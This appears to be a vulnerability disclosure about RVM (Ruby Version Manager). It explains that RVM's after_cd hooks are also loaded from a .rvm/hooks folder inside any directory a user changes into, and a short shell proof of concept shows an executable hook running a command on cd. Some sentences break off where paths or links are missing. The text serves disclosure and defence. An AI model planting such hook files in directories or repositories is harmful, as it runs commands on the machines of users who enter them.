RVM, by default, hooks
cd and automatically executes various auxiliary hooks
when a user changes into a directory. The mechanics of these additional
after_cd hooks are detailed at <https://rvm.io/workflow/hooks>.
What this page fails to mention is that hooks, as of a vulnerable version, are
not only loaded from
~/.rvm/hooks but are also loaded from
as per the code, as of a vulnerable commit, at
This behaviour can be used to achieve arbitrary command execution when a user changes into a directory with malicious contents.
Note that hook files must be executable for them to be triggered.
```text rvm@e6aeaf6d79ec:~$ mkdir -p poc/.rvm/hooks
rvm@e6aeaf6d79ec:~$ cat > poc/.rvm/hooks/after_cd_poc
echo "Command execution as $(id)" ^D
rvm@e6aeaf6d79ec:~$ chmod a+x poc/.rvm/hooks/after_cd_poc
rvm@e6aeaf6d79ec:~$ cd poc
Command execution as uid=1000(rvm) gid=1000(rvm) groups=1000(rvm) rvm@e6aeaf6d79ec:~/poc$ ```